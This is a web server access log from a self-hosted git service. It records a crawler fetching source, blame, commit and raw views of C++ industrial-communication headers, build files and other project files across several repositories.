git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11171] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:41:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 10243] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:15:41:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 11522] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:15:41:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9937] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:41:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10058] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:41:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 424] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:15:41:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:41:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 558] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:15:41:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 10218] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:15:41:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 1611] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:15:41:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 11991] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:41:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:41:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10085] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:41:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 12761] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:41:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 9996] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:15:41:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 558] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:15:41:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 11318] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:15:41:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 12834] [Gzip 6.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:15:41:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 10523] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:15:41:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 9997] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:15:41:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 13132] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:41:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 558] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:15:41:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 9935] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:15:41:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 11293] [Gzip 4.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:15:41:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 10432] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:15:41:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 13638] [Gzip 7.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:15:41:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 1611] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:15:41:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 424] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:15:41:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:41:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:41:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 12510] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:41:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 12702] [Gzip 6.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:15:41:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 1143] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:15:41:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:15:41:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 9986] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:15:41:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 122] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:15:41:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/BatchControl.png?display=rendered" [Client 74.7.227.38] [Length 10861] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/BatchControl.png" -[17/Feb/2026:15:41:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 10887] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/docker-compose.yml" -[17/Feb/2026:15:41:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2fProgram.cs" [Client 74.7.227.38] [Length 28666] [Gzip 6.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/Program.cs" -[17/Feb/2026:15:41:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fTestService%2fobj" [Client 74.7.227.38] [Length 28260] [Gzip 6.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj" -[17/Feb/2026:15:41:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 9807] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/favicon.ico" -[17/Feb/2026:15:41:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 886] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:15:41:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 12898] [Gzip 6.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:15:41:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 10242] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:15:41:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 9794] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/honeywell-logo.svg" -[17/Feb/2026:15:41:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.gitignore?display=source" [Client 74.7.227.38] [Length 12193] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.gitignore" -[17/Feb/2026:15:41:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/README.md?display=rendered" [Client 74.7.227.38] [Length 13345] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/README.md" -[17/Feb/2026:15:41:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker?display=rendered" [Client 74.7.227.38] [Length 16017] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker" -[17/Feb/2026:15:41:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10912] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.gitignore" -[17/Feb/2026:15:41:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10942] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.gitignore" -[17/Feb/2026:15:41:53 +0000] 